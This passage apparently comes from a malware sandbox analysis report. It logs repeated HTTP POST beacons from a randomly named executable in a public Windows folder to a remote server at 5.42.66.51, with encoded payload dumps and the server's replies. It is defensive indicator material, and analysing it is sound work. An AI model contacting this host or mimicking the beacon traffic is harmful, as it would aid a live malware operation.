                                                                                                Oct 11, 2024 20:38:13.841928005 CEST2156OUTData Raw: 5c 58 46 5f 5a 5e 50 5d 54 57 5b 54 52 5c 57 5d 58 5e 58 55 5b 5a 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XF_Z^P]TW[TR\W]X^XU[ZUV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C'?+U>58X'Y-50/#))U 85Q:=&?2$\-"_$,P,+
                                                                                                Oct 11, 2024 20:38:17.231440067 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:17.363260984 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 5d 23 3f 2c 07 3d 33 3e 0d 38 3a 25 54 32 31 3e 5e 25 3b 3f 5c 35 14 34 5b 2e 58 3b 56 26 2a 23 58 29 2f 32 1f 27 2c 30 02 27 2b 2b 5d 0d 10 26 17 24 23 0c 59 3d 38 01 09 2d 10 00 5a 30 2e 26 5a 22 00 3b 50 36 00 0b 14 24 3f 3f 0b 25 13 21 12 3f 24 04 01 3b 12 37 5e 32 3e 2f 55 0f 11 38 53 25 3f 3c 12 23 3e 2c 0e 22 3f 23 05 34 3c 3e 5a 23 23 3f 11 26 03 3b 5a 31 3f 3e 5b 29 30 33 1f 29 31 36 04 27 3a 36 0c 3c 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989]#?,=3>8:%T21>^%;?\54[.X;V&*#X)/2',0'++]&$#Y=8-Z0.&Z";P6$??%!?$;7^2>/U8S%?<#>,"?#4<>Z##?&;Z1?>[)03)16':6<""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                24192.168.2.5500095.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:13.972225904 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:14.326225996 CEST2552OUTData Raw: 59 52 46 58 5f 5f 55 5b 54 57 5b 54 52 5b 57 51 58 55 58 5c 5b 5f 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRFX__U[TW[TR[WQXUX\[_UZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-3 ]>+*U*4[0X!6/X.0#=8=4=V-2>'-"_$,P,7
                                                                                                Oct 11, 2024 20:38:14.680957079 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:14.807430029 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                25192.168.2.5500105.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:15.954253912 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:16.310688972 CEST2552OUTData Raw: 5c 58 46 5a 5a 59 50 5e 54 57 5b 54 52 5c 57 57 58 50 58 5b 5b 5b 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \XFZZYP^TW[TR\WWXPX[[[UV_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.')$\)&V)6[$Y6["688;>1P4W.>=^*!4:"_$,P,+
                                                                                                Oct 11, 2024 20:38:16.641030073 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:16.798054934 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                26192.168.2.5500115.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:17.012120962 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:17.384345055 CEST2552OUTData Raw: 5c 5f 46 5f 5f 5b 55 59 54 57 5b 54 52 59 57 5d 58 50 58 5f 5b 5e 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \_F__[UYTW[TRYW]XPX_[^UX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.3Z=].P=8'6Y5%Z,0$\*(!U#-S:[*> Y9;"_$,P,
                                                                                                Oct 11, 2024 20:38:17.743748903 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:17.875227928 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.5500125.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:18.126899004 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:18.482461929 CEST2552OUTData Raw: 59 53 46 58 5f 5d 55 55 54 57 5b 54 52 56 57 53 58 52 58 5e 5b 5f 55 59 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSFX_]UUTW[TRVWSXRX^[_UY_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.''*(=>&<%<6#%(/#4\=)W4+=P--**!7:"_$,P,
                                                                                                Oct 11, 2024 20:38:18.855479002 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:18.989119053 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.2.5500135.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:18.422544956 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:18.780086994 CEST2156OUTData Raw: 5c 5f 43 51 5f 5a 50 5e 54 57 5b 54 52 5a 57 53 58 5e 58 54 5b 5d 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \_CQ_ZP^TW[TRZWSX^XT[]U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D'#*;:*%([%?"!C?Z/07=8>!(.9!?1#-+"_$,P,3
                                                                                                Oct 11, 2024 20:38:19.119211912 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:19.247859955 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 10 35 3f 2f 15 3e 33 2a 0c 2e 39 2d 13 26 0b 3e 5c 26 38 0d 16 21 04 30 58 2d 58 33 51 25 14 30 05 2b 2f 26 1e 25 3c 37 13 30 2b 2b 5d 0d 10 25 05 33 0a 26 13 3d 06 0e 54 2e 00 31 07 33 10 3d 06 22 10 0e 08 36 3e 0b 5f 31 2c 02 1a 26 2d 2e 0f 28 24 0b 11 2d 2c 34 06 25 3e 2f 55 0f 11 3b 0b 26 2c 34 5f 36 2d 23 53 37 2c 24 1b 23 2c 31 00 23 0d 27 5b 31 29 33 12 32 2c 03 01 3d 33 0d 57 29 32 22 07 32 3a 25 51 28 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9895?/>3*.9-&>\&8!0X-X3Q%0+/&%<70++]%3&=T.13="6>_1,&-.($-,4%>/U;&,4_6-#S7,$#,1#'[1)32,=3W)2"2:%Q(2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.2.5500145.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:19.169430971 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:19.513806105 CEST2552OUTData Raw: 59 52 43 5a 5f 5a 55 59 54 57 5b 54 52 5c 57 52 58 5e 58 5e 5b 55 55 5a 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YRCZ_ZUYTW[TR\WRX^X^[UUZ_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.D3[>+*>^'5%/X,3>%#%V:!>$\-;"_$,P,+
                                                                                                Oct 11, 2024 20:38:19.874109030 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:20.009227037 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.2.5500155.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:20.597652912 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:20.951256990 CEST2156OUTData Raw: 5c 5e 46 5f 5f 5b 55 5c 54 57 5b 54 52 56 57 51 58 56 58 5f 5b 5a 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \^F__[U\TW[TRVWQXVX_[ZUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%9+)*P>[$?X";,4)(U#(.=>W'-"_$,P,
                                                                                                Oct 11, 2024 20:38:21.353313923 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:21.487262011 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 13 35 01 2f 1b 29 33 22 0c 3b 2a 31 1e 32 0c 00 5d 26 5e 34 05 23 2a 12 5c 39 00 01 54 25 03 3f 5c 2a 5a 32 56 30 3c 33 58 25 3b 2b 5d 0d 10 25 05 33 0d 3d 00 2a 06 3b 0c 39 00 2e 5e 25 2d 3d 03 22 10 23 55 22 3d 21 19 25 02 0a 1a 25 03 3d 12 28 27 31 5b 2f 05 2c 00 32 14 2f 55 0f 11 38 52 32 3f 3c 5e 35 3e 2f 1c 20 3c 2b 00 23 3f 25 02 37 23 24 02 31 3a 3c 01 26 5a 22 5f 29 0a 23 1f 2a 0c 21 5d 31 39 3e 08 28 32 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9895/)3";*12]&^4#*\9T%?\*Z2V0<3X%;+]%3=*;9.^%-="#U"=!%%=('1[/,2/U8R2?<^5>/ <+#?%7#$1:<&Z"_)#*!]19>(2"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.2.5500165.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:20.741406918 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:21.091864109 CEST2552OUTData Raw: 59 5f 43 5b 5f 5d 55 5f 54 57 5b 54 52 5a 57 56 58 57 58 5d 5b 54 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_C[_]U_TW[TRZWVXWX][TU[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-%)3=&*&4Z36!Y,U [*>#599Z=</;"_$,P,3
                                                                                                Oct 11, 2024 20:38:21.508263111 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:21.641164064 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.2.5500175.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:21.769016981 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:22.123220921 CEST2552OUTData Raw: 5c 5d 46 5b 5a 5e 50 5e 54 57 5b 54 52 5a 57 55 58 51 58 54 5b 59 55 5b 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]F[Z^P^TW[TRZWUXQXT[YU[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.' [>;)) Y3<.["58,U8):#8.-.5_>"'/;"_$,P,3
                                                                                                Oct 11, 2024 20:38:22.458251953 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:22.587789059 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:22 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.2.5500185.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:22.508526087 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2128
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:22.857636929 CEST2128OUTData Raw: 59 5b 46 5a 5a 58 55 5e 54 57 5b 54 52 5c 57 54 58 55 58 5b 5b 5a 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y[FZZXU^TW[TR\WTXUX[[ZU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-')$\?(&U)5?3Y%!5\8$=8%7..[>=,]-;"_$,P,+
                                                                                                Oct 11, 2024 20:38:26.221218109 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:26.380939007 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 35 3f 24 04 29 33 21 51 38 5c 3d 1e 32 0b 25 01 31 38 28 05 22 03 24 11 3a 58 33 54 31 3a 0d 1f 3e 05 26 53 27 11 0a 07 30 3b 2b 5d 0d 10 26 5b 24 20 2d 00 2a 28 0d 0d 2d 00 04 5e 33 00 36 5e 35 3e 33 52 21 00 07 14 25 2c 05 09 26 13 39 51 28 42 39 1e 2f 3c 27 5d 31 3e 2f 55 0f 11 3b 0a 26 3c 3f 02 22 2e 27 57 34 3c 3c 15 20 3c 32 10 22 33 3f 1f 32 14 20 05 26 12 2e 5f 29 20 3c 0d 2a 22 35 1a 32 29 36 0f 2b 08 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9895?$)3!Q8\=2%18("$:X3T1:>&S'0;+]&[$ -*(-^36^5>3R!%,&9Q(B9/<']1>/U;&<?".'W4<< <2"3?2 &._) <*"52)6+"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.2.5500195.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:38:22.741631985 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:23.091861963 CEST2552OUTData Raw: 59 5a 46 5b 5f 59 55 54 54 57 5b 54 52 5f 57 53 58 53 58 5d 5b 5d 55 56 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
